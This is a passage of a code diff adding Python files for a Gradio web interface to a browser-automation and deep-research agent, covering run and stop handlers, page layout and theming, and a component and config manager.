last_plan_mtime = current_mtime
|
| 217 |
+
elif plan_content is None:
|
| 218 |
+
# File might have been deleted or became unreadable
|
| 219 |
+
last_plan_mtime = 0 # Reset to force re-read attempt later
|
| 220 |
+
except Exception as e:
|
| 221 |
+
logger.warning(f"Error checking/reading plan file {plan_file_path}: {e}")
|
| 222 |
+
# Avoid continuous logging for the same error
|
| 223 |
+
await asyncio.sleep(2.0)
|
| 224 |
+
|
| 225 |
+
# Yield updates if any
|
| 226 |
+
if update_dict:
|
| 227 |
+
yield update_dict
|
| 228 |
+
|
| 229 |
+
await asyncio.sleep(1.0) # Check file changes every second
|
| 230 |
+
|
| 231 |
+
# --- 7. Task Finalization ---
|
| 232 |
+
logger.info("Agent task processing finished. Awaiting final result...")
|
| 233 |
+
final_result_dict = await agent_task # Get result or raise exception
|
| 234 |
+
logger.info(f"Agent run completed. Result keys: {final_result_dict.keys() if final_result_dict else 'None'}")
|
| 235 |
+
|
| 236 |
+
# Try to get task ID from result if not known before
|
| 237 |
+
if not running_task_id and final_result_dict and 'task_id' in final_result_dict:
|
| 238 |
+
running_task_id = final_result_dict['task_id']
|
| 239 |
+
webui_manager.dr_task_id = running_task_id
|
| 240 |
+
task_specific_dir = os.path.join(base_save_dir, str(running_task_id))
|
| 241 |
+
report_file_path = os.path.join(task_specific_dir, "report.md")
|
| 242 |
+
logger.info(f"Task ID confirmed from result: {running_task_id}")
|
| 243 |
+
|
| 244 |
+
final_ui_update = {}
|
| 245 |
+
if report_file_path and os.path.exists(report_file_path):
|
| 246 |
+
logger.info(f"Loading final report from: {report_file_path}")
|
| 247 |
+
report_content = _read_file_safe(report_file_path)
|
| 248 |
+
if report_content:
|
| 249 |
+
final_ui_update[markdown_display_comp] = gr.update(value=report_content)
|
| 250 |
+
final_ui_update[markdown_download_comp] = gr.File(value=report_file_path,
|
| 251 |
+
label=f"Report ({running_task_id}.md)",
|
| 252 |
+
interactive=True)
|
| 253 |
+
else:
|
| 254 |
+
final_ui_update[markdown_display_comp] = gr.update(
|
| 255 |
+
value="# Research Complete\n\n*Error reading final report file.*")
|
| 256 |
+
elif final_result_dict and 'report' in final_result_dict:
|
| 257 |
+
logger.info("Using report content directly from agent result.")
|
| 258 |
+
# If agent directly returns report content
|
| 259 |
+
final_ui_update[markdown_display_comp] = gr.update(value=final_result_dict['report'])
|
| 260 |
+
# Cannot offer download if only content is available
|
| 261 |
+
final_ui_update[markdown_download_comp] = gr.update(value=None, label="Download Research Report",
|
| 262 |
+
interactive=False)
|
| 263 |
+
else:
|
| 264 |
+
logger.warning("Final report file not found and not in result dict.")
|
| 265 |
+
final_ui_update[markdown_display_comp] = gr.update(value="# Research Complete\n\n*Final report not found.*")
|
| 266 |
+
|
| 267 |
+
yield final_ui_update
|
| 268 |
+
|
| 269 |
+
|
| 270 |
+
except Exception as e:
|
| 271 |
+
logger.error(f"Error during Deep Research Agent execution: {e}", exc_info=True)
|
| 272 |
+
gr.Error(f"Research failed: {e}")
|
| 273 |
+
yield {markdown_display_comp: gr.update(value=f"# Research Failed\n\n**Error:**\n```\n{e}\n```")}
|
| 274 |
+
|
| 275 |
+
finally:
|
| 276 |
+
# --- 8. Final UI Reset ---
|
| 277 |
+
webui_manager.dr_current_task = None # Clear task reference
|
| 278 |
+
webui_manager.dr_task_id = None # Clear running task ID
|
| 279 |
+
|
| 280 |
+
yield {
|
| 281 |
+
start_button_comp: gr.update(value="▶️ Run", interactive=True),
|
| 282 |
+
stop_button_comp: gr.update(interactive=False),
|
| 283 |
+
research_task_comp: gr.update(interactive=True),
|
| 284 |
+
resume_task_id_comp: gr.update(value="", interactive=True),
|
| 285 |
+
parallel_num_comp: gr.update(interactive=True),
|
| 286 |
+
save_dir_comp: gr.update(interactive=True),
|
| 287 |
+
# Keep download button enabled if file exists
|
| 288 |
+
markdown_download_comp: gr.update() if report_file_path and os.path.exists(report_file_path) else gr.update(
|
| 289 |
+
interactive=False)
|
| 290 |
+
}
|
| 291 |
+
|
| 292 |
+
|
| 293 |
+
async def stop_deep_research(webui_manager: WebuiManager) -> Dict[Component, Any]:
|
| 294 |
+
"""Handles the Stop button click."""
|
| 295 |
+
logger.info("Stop button clicked for Deep Research.")
|
| 296 |
+
agent = webui_manager.dr_agent
|
| 297 |
+
task = webui_manager.dr_current_task
|
| 298 |
+
task_id = webui_manager.dr_task_id
|
| 299 |
+
base_save_dir = webui_manager.dr_save_dir
|
| 300 |
+
|
| 301 |
+
stop_button_comp = webui_manager.get_component_by_id("deep_research_agent.stop_button")
|
| 302 |
+
start_button_comp = webui_manager.get_component_by_id("deep_research_agent.start_button")
|
| 303 |
+
markdown_display_comp = webui_manager.get_component_by_id("deep_research_agent.markdown_display")
|
| 304 |
+
markdown_download_comp = webui_manager.get_component_by_id("deep_research_agent.markdown_download")
|
| 305 |
+
|
| 306 |
+
final_update = {
|
| 307 |
+
stop_button_comp: gr.update(interactive=False, value="⏹️ Stopping...")
|
| 308 |
+
}
|
| 309 |
+
|
| 310 |
+
if agent and task and not task.done():
|
| 311 |
+
logger.info("Signalling DeepResearchAgent to stop.")
|
| 312 |
+
try:
|
| 313 |
+
# Assuming stop is synchronous or sets a flag quickly
|
| 314 |
+
await agent.stop()
|
| 315 |
+
except Exception as e:
|
| 316 |
+
logger.error(f"Error calling agent.stop(): {e}")
|
| 317 |
+
|
| 318 |
+
# The run_deep_research loop should detect the stop and exit.
|
| 319 |
+
# We yield an intermediate "Stopping..." state. The final reset is done by run_deep_research.
|
| 320 |
+
|
| 321 |
+
# Try to show the final report if available after stopping
|
| 322 |
+
await asyncio.sleep(1.5) # Give agent a moment to write final files potentially
|
| 323 |
+
report_file_path = None
|
| 324 |
+
if task_id and base_save_dir:
|
| 325 |
+
report_file_path = os.path.join(base_save_dir, str(task_id), "report.md")
|
| 326 |
+
|
| 327 |
+
if report_file_path and os.path.exists(report_file_path):
|
| 328 |
+
report_content = _read_file_safe(report_file_path)
|
| 329 |
+
if report_content:
|
| 330 |
+
final_update[markdown_display_comp] = gr.update(
|
| 331 |
+
value=report_content + "\n\n---\n*Research stopped by user.*")
|
| 332 |
+
final_update[markdown_download_comp] = gr.File(value=report_file_path, label=f"Report ({task_id}.md)",
|
| 333 |
+
interactive=True)
|
| 334 |
+
else:
|
| 335 |
+
final_update[markdown_display_comp] = gr.update(
|
| 336 |
+
value="# Research Stopped\n\n*Error reading final report file after stop.*")
|
| 337 |
+
else:
|
| 338 |
+
final_update[markdown_display_comp] = gr.update(value="# Research Stopped by User")
|
| 339 |
+
|
| 340 |
+
# Keep start button disabled, run_deep_research finally block will re-enable it.
|
| 341 |
+
final_update[start_button_comp] = gr.update(interactive=False)
|
| 342 |
+
|
| 343 |
+
else:
|
| 344 |
+
logger.warning("Stop clicked but no active research task found.")
|
| 345 |
+
# Reset UI state just in case
|
| 346 |
+
final_update = {
|
| 347 |
+
start_button_comp: gr.update(interactive=True),
|
| 348 |
+
stop_button_comp: gr.update(interactive=False),
|
| 349 |
+
webui_manager.get_component_by_id("deep_research_agent.research_task"): gr.update(interactive=True),
|
| 350 |
+
webui_manager.get_component_by_id("deep_research_agent.resume_task_id"): gr.update(interactive=True),
|
| 351 |
+
webui_manager.get_component_by_id("deep_research_agent.max_iteration"): gr.update(interactive=True),
|
| 352 |
+
webui_manager.get_component_by_id("deep_research_agent.max_query"): gr.update(interactive=True),
|
| 353 |
+
}
|
| 354 |
+
|
| 355 |
+
return final_update
|
| 356 |
+
|
| 357 |
+
|
| 358 |
+
async def update_mcp_server(mcp_file: str, webui_manager: WebuiManager):
|
| 359 |
+
"""
|
| 360 |
+
Update the MCP server.
|
| 361 |
+
"""
|
| 362 |
+
if hasattr(webui_manager, "dr_agent") and webui_manager.dr_agent:
|
| 363 |
+
logger.warning("⚠️ Close controller because mcp file has changed!")
|
| 364 |
+
await webui_manager.dr_agent.close_mcp_client()
|
| 365 |
+
|
| 366 |
+
if not mcp_file or not os.path.exists(mcp_file) or not mcp_file.endswith('.json'):
|
| 367 |
+
logger.warning(f"{mcp_file} is not a valid MCP file.")
|
| 368 |
+
return None, gr.update(visible=False)
|
| 369 |
+
|
| 370 |
+
with open(mcp_file, 'r') as f:
|
| 371 |
+
mcp_server = json.load(f)
|
| 372 |
+
|
| 373 |
+
return json.dumps(mcp_server, indent=2), gr.update(visible=True)
|
| 374 |
+
|
| 375 |
+
|
| 376 |
+
def create_deep_research_agent_tab(webui_manager: WebuiManager):
|
| 377 |
+
"""
|
| 378 |
+
Creates a deep research agent tab
|
| 379 |
+
"""
|
| 380 |
+
input_components = set(webui_manager.get_components())
|
| 381 |
+
tab_components = {}
|
| 382 |
+
|
| 383 |
+
with gr.Group():
|
| 384 |
+
with gr.Row():
|
| 385 |
+
mcp_json_file = gr.File(label="MCP server json", interactive=True, file_types=[".json"])
|
| 386 |
+
mcp_server_config = gr.Textbox(label="MCP server", lines=6, interactive=True, visible=False)
|
| 387 |
+
|
| 388 |
+
with gr.Group():
|
| 389 |
+
research_task = gr.Textbox(label="Research Task", lines=5,
|
| 390 |
+
value="Give me a detailed travel plan to Switzerland from June 1st to 10th.",
|
| 391 |
+
interactive=True)
|
| 392 |
+
with gr.Row():
|
| 393 |
+
resume_task_id = gr.Textbox(label="Resume Task ID", value="",
|
| 394 |
+
interactive=True)
|
| 395 |
+
parallel_num = gr.Number(label="Parallel Agent Num", value=1,
|
| 396 |
+
precision=0,
|
| 397 |
+
interactive=True)
|
| 398 |
+
max_query = gr.Textbox(label="Research Save Dir", value="./tmp/deep_research",
|
| 399 |
+
interactive=True)
|
| 400 |
+
with gr.Row():
|
| 401 |
+
stop_button = gr.Button("⏹️ Stop", variant="stop", scale=2)
|
| 402 |
+
start_button = gr.Button("▶️ Run", variant="primary", scale=3)
|
| 403 |
+
with gr.Group():
|
| 404 |
+
markdown_display = gr.Markdown(label="Research Report")
|
| 405 |
+
markdown_download = gr.File(label="Download Research Report", interactive=False)
|
| 406 |
+
tab_components.update(
|
| 407 |
+
dict(
|
| 408 |
+
research_task=research_task,
|
| 409 |
+
parallel_num=parallel_num,
|
| 410 |
+
max_query=max_query,
|
| 411 |
+
start_button=start_button,
|
| 412 |
+
stop_button=stop_button,
|
| 413 |
+
markdown_display=markdown_display,
|
| 414 |
+
markdown_download=markdown_download,
|
| 415 |
+
resume_task_id=resume_task_id,
|
| 416 |
+
mcp_json_file=mcp_json_file,
|
| 417 |
+
mcp_server_config=mcp_server_config,
|
| 418 |
+
)
|
| 419 |
+
)
|
| 420 |
+
webui_manager.add_components("deep_research_agent", tab_components)
|
| 421 |
+
webui_manager.init_deep_research_agent()
|
| 422 |
+
|
| 423 |
+
async def update_wrapper(mcp_file):
|
| 424 |
+
"""Wrapper for handle_pause_resume."""
|
| 425 |
+
update_dict = await update_mcp_server(mcp_file, webui_manager)
|
| 426 |
+
yield update_dict
|
| 427 |
+
|
| 428 |
+
mcp_json_file.change(
|
| 429 |
+
update_wrapper,
|
| 430 |
+
inputs=[mcp_json_file],
|
| 431 |
+
outputs=[mcp_server_config, mcp_server_config]
|
| 432 |
+
)
|
| 433 |
+
|
| 434 |
+
dr_tab_outputs = list(tab_components.values())
|
| 435 |
+
all_managed_inputs = set(webui_manager.get_components())
|
| 436 |
+
|
| 437 |
+
# --- Define Event Handler Wrappers ---
|
| 438 |
+
async def start_wrapper(comps: Dict[Component, Any]) -> AsyncGenerator[Dict[Component, Any], None]:
|
| 439 |
+
async for update in run_deep_research(webui_manager, comps):
|
| 440 |
+
yield update
|
| 441 |
+
|
| 442 |
+
async def stop_wrapper() -> AsyncGenerator[Dict[Component, Any], None]:
|
| 443 |
+
update_dict = await stop_deep_research(webui_manager)
|
| 444 |
+
yield update_dict
|
| 445 |
+
|
| 446 |
+
# --- Connect Handlers ---
|
| 447 |
+
start_button.click(
|
| 448 |
+
fn=start_wrapper,
|
| 449 |
+
inputs=all_managed_inputs,
|
| 450 |
+
outputs=dr_tab_outputs
|
| 451 |
+
)
|
| 452 |
+
|
| 453 |
+
stop_button.click(
|
| 454 |
+
fn=stop_wrapper,
|
| 455 |
+
inputs=None,
|
| 456 |
+
outputs=dr_tab_outputs
|
| 457 |
+
)
|
src/webui/interface.py
ADDED
|
@@ -0,0 +1,179 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
"""
|
| 2 |
+
🤖 Fagun Browser Automation Testing Agent - Web Interface
|
| 3 |
+
=========================================================
|
| 4 |
+
|
| 5 |
+
Web UI components for the Fagun Browser Automation Testing Agent.
|
| 6 |
+
|
| 7 |
+
Author: Mejbaur Bahar Fagun
|
| 8 |
+
Role: Software Engineer in Test
|
| 9 |
+
LinkedIn: https://www.linkedin.com/in/mejbaur/
|
| 10 |
+
"""
|
| 11 |
+
|
| 12 |
+
import gradio as gr
|
| 13 |
+
|
| 14 |
+
from src.webui.webui_manager import WebuiManager
|
| 15 |
+
from src.webui.components.agent_settings_tab import create_agent_settings_tab
|
| 16 |
+
from src.webui.components.browser_settings_tab import create_browser_settings_tab
|
| 17 |
+
from src.webui.components.browser_use_agent_tab import create_browser_use_agent_tab
|
| 18 |
+
|
| 19 |
+
theme_map = {
|
| 20 |
+
"Default": gr.themes.Default(),
|
| 21 |
+
"Soft": gr.themes.Soft(),
|
| 22 |
+
"Monochrome": gr.themes.Monochrome(),
|
| 23 |
+
"Glass": gr.themes.Glass(),
|
| 24 |
+
"Origin": gr.themes.Origin(),
|
| 25 |
+
"Citrus": gr.themes.Citrus(),
|
| 26 |
+
"Ocean": gr.themes.Ocean(),
|
| 27 |
+
"Base": gr.themes.Base()
|
| 28 |
+
}
|
| 29 |
+
|
| 30 |
+
|
| 31 |
+
def create_ui(theme_name="Ocean"):
|
| 32 |
+
css = """
|
| 33 |
+
.gradio-container {
|
| 34 |
+
width: 70vw !important;
|
| 35 |
+
max-width: 70% !important;
|
| 36 |
+
margin-left: auto !important;
|
| 37 |
+
margin-right: auto !important;
|
| 38 |
+
padding-top: 100px !important;
|
| 39 |
+
}
|
| 40 |
+
.header-text {
|
| 41 |
+
text-align: center;
|
| 42 |
+
margin-bottom: 20px;
|
| 43 |
+
position: fixed !important;
|
| 44 |
+
top: 0 !important;
|
| 45 |
+
left: 0 !important;
|
| 46 |
+
right: 0 !important;
|
| 47 |
+
z-index: 1000 !important;
|
| 48 |
+
background-color: var(--body-background-fill) !important;
|
| 49 |
+
padding: 20px 0 !important;
|
| 50 |
+
border-bottom: 2px solid var(--border-color-primary) !important;
|
| 51 |
+
box-shadow: 0 2px 4px rgba(0,0,0,0.1) !important;
|
| 52 |
+
line-height: 1.2 !important;
|
| 53 |
+
}
|
| 54 |
+
.header-text h1 {
|
| 55 |
+
margin: 0 0 10px 0 !important;
|
| 56 |
+
font-size: 2.5em !important;
|
| 57 |
+
line-height: 1.1 !important;
|
| 58 |
+
}
|
| 59 |
+
.header-text h3 {
|
| 60 |
+
margin: 0 !important;
|
| 61 |
+
font-size: 1.2em !important;
|
| 62 |
+
line-height: 1.2 !important;
|
| 63 |
+
opacity: 0.9 !important;
|
| 64 |
+
}
|
| 65 |
+
.tab-header-text {
|
| 66 |
+
text-align: center;
|
| 67 |
+
}
|
| 68 |
+
.theme-section {
|
| 69 |
+
margin-bottom: 10px;
|
| 70 |
+
padding: 15px;
|
| 71 |
+
border-radius: 10px;
|
| 72 |
+
}
|
| 73 |
+
/* Hide default Gradio footer */
|
| 74 |
+
.gradio-container footer {
|
| 75 |
+
display: none !important;
|
| 76 |
+
}
|
| 77 |
+
.gradio-container .footer {
|
| 78 |
+
display: none !important;
|
| 79 |
+
}
|
| 80 |
+
/* Override hide-container behavior for header */
|
| 81 |
+
.hide-container {
|
| 82 |
+
display: block !important;
|
| 83 |
+
visibility: visible !important;
|
| 84 |
+
opacity: 1 !important;
|
| 85 |
+
}
|
| 86 |
+
/* Ensure header is always visible */
|
| 87 |
+
.header-text, .header-text * {
|
| 88 |
+
display: block !important;
|
| 89 |
+
visibility: visible !important;
|
| 90 |
+
opacity: 1 !important;
|
| 91 |
+
position: fixed !important;
|
| 92 |
+
top: 0 !important;
|
| 93 |
+
left: 0 !important;
|
| 94 |
+
right: 0 !important;
|
| 95 |
+
z-index: 1000 !important;
|
| 96 |
+
}
|
| 97 |
+
/* Override any Gradio hiding classes for header */
|
| 98 |
+
.header-text.hide-container,
|
| 99 |
+
.header-text.svelte-11xb1hd,
|
| 100 |
+
.header-text.padded,
|
| 101 |
+
.header-text.auto-margin {
|
| 102 |
+
display: block !important;
|
| 103 |
+
visibility: visible !important;
|
| 104 |
+
opacity: 1 !important;
|
| 105 |
+
position: fixed !important;
|
| 106 |
+
top: 0 !important;
|
| 107 |
+
left: 0 !important;
|
| 108 |
+
right: 0 !important;
|
| 109 |
+
z-index: 1000 !important;
|
| 110 |
+
}
|
| 111 |
+
"""
|
| 112 |
+
|
| 113 |
+
# dark mode in default
|
| 114 |
+
js_func = """
|
| 115 |
+
function refresh() {
|
| 116 |
+
const url = new URL(window.location);
|
| 117 |
+
|
| 118 |
+
if (url.searchParams.get('__theme') !== 'dark') {
|
| 119 |
+
url.searchParams.set('__theme', 'dark');
|
| 120 |
+
window.location.href = url.href;
|
| 121 |
+
}
|
| 122 |
+
}
|
| 123 |
+
"""
|
| 124 |
+
|
| 125 |
+
ui_manager = WebuiManager()
|
| 126 |
+
|
| 127 |
+
with gr.Blocks(
|
| 128 |
+
title="Fagun Browser Automation Testing Agent", theme=theme_map[theme_name], css=css, js=js_func,
|
| 129 |
+
head="""
|
| 130 |
+
<link rel="icon" href="data:image/svg+xml,<svg xmlns=%22http://www.w3.org/2000/svg%22 viewBox=%220 0 100 100%22><text y=%22.9em%22 font-size=%2290%22>🤖</text></svg>">
|
| 131 |
+
<meta name="viewport" content="width=device-width, initial-scale=1.0">
|
| 132 |
+
""",
|
| 133 |
+
) as demo:
|
| 134 |
+
with gr.Row():
|
| 135 |
+
gr.Markdown(
|
| 136 |
+
"""
|
| 137 |
+
# 🤖 Fagun Browser Automation Testing Agent
|
| 138 |
+
""",
|
| 139 |
+
elem_classes=["header-text"],
|
| 140 |
+
)
|
| 141 |
+
|
| 142 |
+
with gr.Tabs() as tabs:
|
| 143 |
+
with gr.TabItem("⚙️ Agent Settings"):
|
| 144 |
+
create_agent_settings_tab(ui_manager)
|
| 145 |
+
|
| 146 |
+
with gr.TabItem("🌐 Browser Settings"):
|
| 147 |
+
create_browser_settings_tab(ui_manager)
|
| 148 |
+
|
| 149 |
+
with gr.TabItem("🤖 Run Agent"):
|
| 150 |
+
create_browser_use_agent_tab(ui_manager)
|
| 151 |
+
|
| 152 |
+
# Custom Footer
|
| 153 |
+
with gr.Row():
|
| 154 |
+
gr.HTML(
|
| 155 |
+
"""
|
| 156 |
+
<div style="text-align: center; margin-top: 20px; padding: 10px; border-top: 1px solid #ccc;">
|
| 157 |
+
<p style="margin: 5px 0;">
|
| 158 |
+
<a href="https://www.linkedin.com/in/mejbaur/" target="_blank" style="text-decoration: none; color: #0077b5;">
|
| 159 |
+
Connect with Builder
|
| 160 |
+
</a>
|
| 161 |
+
</p>
|
| 162 |
+
<p style="margin: 5px 0; font-weight: bold; font-size: 1.1em; background: linear-gradient(45deg, #ff6b6b, #4ecdc4, #45b7d1, #96ceb4, #feca57, #ff9ff3, #54a0ff); background-size: 400% 400%; -webkit-background-clip: text; -webkit-text-fill-color: transparent; background-clip: text; animation: gradientShift 3s ease-in-out infinite;">
|
| 163 |
+
Mejbaur Bahar Fagun
|
| 164 |
+
</p>
|
| 165 |
+
<p style="margin: 5px 0; color: #666; font-size: 0.9em;">
|
| 166 |
+
Software Engineer in Test
|
| 167 |
+
</p>
|
| 168 |
+
</div>
|
| 169 |
+
<style>
|
| 170 |
+
@keyframes gradientShift {
|
| 171 |
+
0% { background-position: 0% 50%; }
|
| 172 |
+
50% { background-position: 100% 50%; }
|
| 173 |
+
100% { background-position: 0% 50%; }
|
| 174 |
+
}
|
| 175 |
+
</style>
|
| 176 |
+
"""
|
| 177 |
+
)
|
| 178 |
+
|
| 179 |
+
return demo
|
src/webui/webui_manager.py
ADDED
|
@@ -0,0 +1,146 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
"""
|
| 2 |
+
🤖 Fagun Browser Automation Testing Agent - WebUI Manager
|
| 3 |
+
=========================================================
|
| 4 |
+
|
| 5 |
+
Core management system for the Fagun Browser Automation Testing Agent.
|
| 6 |
+
|
| 7 |
+
Author: Mejbaur Bahar Fagun
|
| 8 |
+
Role: Software Engineer in Test
|
| 9 |
+
LinkedIn: https://www.linkedin.com/in/mejbaur/
|
| 10 |
+
"""
|
| 11 |
+
|
| 12 |
+
import json
|
| 13 |
+
from collections.abc import Generator
|
| 14 |
+
from typing import TYPE_CHECKING
|
| 15 |
+
import os
|
| 16 |
+
import gradio as gr
|
| 17 |
+
from datetime import datetime
|
| 18 |
+
from typing import Optional, Dict, List
|
| 19 |
+
import uuid
|
| 20 |
+
import asyncio
|
| 21 |
+
import time
|
| 22 |
+
|
| 23 |
+
from gradio.components import Component
|
| 24 |
+
from browser_use.browser.browser import Browser
|
| 25 |
+
from browser_use.browser.context import BrowserContext
|
| 26 |
+
from browser_use.agent.service import Agent
|
| 27 |
+
from src.browser.custom_browser import CustomBrowser
|
| 28 |
+
from src.browser.custom_context import CustomBrowserContext
|
| 29 |
+
from src.controller.custom_controller import CustomController
|
| 30 |
+
from src.agent.deep_research.deep_research_agent import DeepResearchAgent
|
| 31 |
+
|
| 32 |
+
|
| 33 |
+
class WebuiManager:
|
| 34 |
+
def __init__(self, settings_save_dir: str = "./tmp/webui_settings"):
|
| 35 |
+
self.id_to_component: dict[str, Component] = {}
|
| 36 |
+
self.component_to_id: dict[Component, str] = {}
|
| 37 |
+
|
| 38 |
+
self.settings_save_dir = settings_save_dir
|
| 39 |
+
os.makedirs(self.settings_save_dir, exist_ok=True)
|
| 40 |
+
|
| 41 |
+
def init_browser_use_agent(self) -> None:
|
| 42 |
+
"""
|
| 43 |
+
init browser use agent
|
| 44 |
+
"""
|
| 45 |
+
self.bu_agent: Optional[Agent] = None
|
| 46 |
+
self.bu_browser: Optional[CustomBrowser] = None
|
| 47 |
+
self.bu_browser_context: Optional[CustomBrowserContext] = None
|
| 48 |
+
self.bu_controller: Optional[CustomController] = None
|
| 49 |
+
self.bu_chat_history: List[Dict[str, Optional[str]]] = []
|
| 50 |
+
self.bu_response_event: Optional[asyncio.Event] = None
|
| 51 |
+
self.bu_last_pdf_report: Optional[str] = None
|
| 52 |
+
self.bu_user_help_response: Optional[str] = None
|
| 53 |
+
self.bu_current_task: Optional[asyncio.Task] = None
|
| 54 |
+
self.bu_agent_task_id: Optional[str] = None
|
| 55 |
+
|
| 56 |
+
def init_deep_research_agent(self) -> None:
|
| 57 |
+
"""
|
| 58 |
+
init deep research agent
|
| 59 |
+
"""
|
| 60 |
+
self.dr_agent: Optional[DeepResearchAgent] = None
|
| 61 |
+
self.dr_current_task = None
|
| 62 |
+
self.dr_agent_task_id: Optional[str] = None
|
| 63 |
+
self.dr_save_dir: Optional[str] = None
|
| 64 |
+
|
| 65 |
+
def add_components(self, tab_name: str, components_dict: dict[str, "Component"]) -> None:
|
| 66 |
+
"""
|
| 67 |
+
Add tab components
|
| 68 |
+
"""
|
| 69 |
+
for comp_name, component in components_dict.items():
|
| 70 |
+
comp_id = f"{tab_name}.{comp_name}"
|
| 71 |
+
self.id_to_component[comp_id] = component
|
| 72 |
+
self.component_to_id[component] = comp_id
|
| 73 |
+
|
| 74 |
+
def get_components(self) -> list["Component"]:
|
| 75 |
+
"""
|
| 76 |
+
Get all components
|
| 77 |
+
"""
|
| 78 |
+
return list(self.id_to_component.values())
|
| 79 |
+
|
| 80 |
+
def get_component_by_id(self, comp_id: str) -> "Component":
|
| 81 |
+
"""
|
| 82 |
+
Get component by id
|
| 83 |
+
"""
|
| 84 |
+
return self.id_to_component[comp_id]
|
| 85 |
+
|
| 86 |
+
def get_id_by_component(self, comp: "Component") -> str:
|
| 87 |
+
"""
|
| 88 |
+
Get id by component
|
| 89 |
+
"""
|
| 90 |
+
return self.component_to_id[comp]
|
| 91 |
+
|
| 92 |
+
def save_config(self, components: Dict["Component", str]) -> None:
|
| 93 |
+
"""
|
| 94 |
+
Save config
|
| 95 |
+
"""
|
| 96 |
+
cur_settings = {}
|
| 97 |
+
for comp in components:
|
| 98 |
+
if not isinstance(comp, gr.Button) and not isinstance(comp, gr.File) and str(
|
| 99 |
+
getattr(comp, "interactive", True)).lower() != "false":
|
| 100 |
+
comp_id = self.get_id_by_component(comp)
|
| 101 |
+
cur_settings[comp_id] = components[comp]
|
| 102 |
+
|
| 103 |
+
config_name = datetime.now().strftime("%Y%m%d-%H%M%S")
|
| 104 |
+
with open(os.path.join(self.settings_save_dir, f"{config_name}.json"), "w") as fw:
|
| 105 |
+
json.dump(cur_settings, fw, indent=4)
|
| 106 |
+
|
| 107 |
+
return os.path.join(self.settings_save_dir, f"{config_name}.json")
|
| 108 |
+
|
| 109 |
+
def load_config(self, config_path: str):
|
| 110 |
+
"""
|
| 111 |
+
Load config
|
| 112 |
+
"""
|
| 113 |
+
with open(config_path, "r") as fr:
|
| 114 |
+
ui_settings = json.load(fr)
|
| 115 |
+
|
| 116 |
+
update_components = {}
|
| 117 |
+
for comp_id, comp_val in ui_settings.items():
|
| 118 |
+
if comp_id in self.id_to_component:
|
| 119 |
+
comp = self.id_to_component[comp_id]
|
| 120 |
+
if comp.__class__.__name__ == "Chatbot":
|
| 121 |
+
update_components[comp] = comp.__class__(value=comp_val, type="messages")
|
| 122 |
+
else:
|
| 123 |
+
update_components[comp] = comp.__class__(value=comp_val)
|
| 124 |
+
if comp_id == "agent_settings.planner_llm_provider":
|
| 125 |
+
yield update_components # yield provider, let callback run
|
| 126 |
+
time.sleep(0.1) # wait for Gradio UI callback
|
| 127 |
+
|
| 128 |
+
